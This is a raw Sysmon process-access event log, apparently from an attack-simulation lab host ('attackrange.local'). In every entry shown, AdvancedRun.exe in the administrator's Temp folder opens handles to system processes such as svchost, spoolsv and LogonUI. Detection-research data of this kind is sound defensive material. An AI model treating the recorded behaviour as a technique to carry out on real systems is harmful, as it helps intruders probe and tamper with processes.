18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004016194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004016193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:40.161{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004016189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
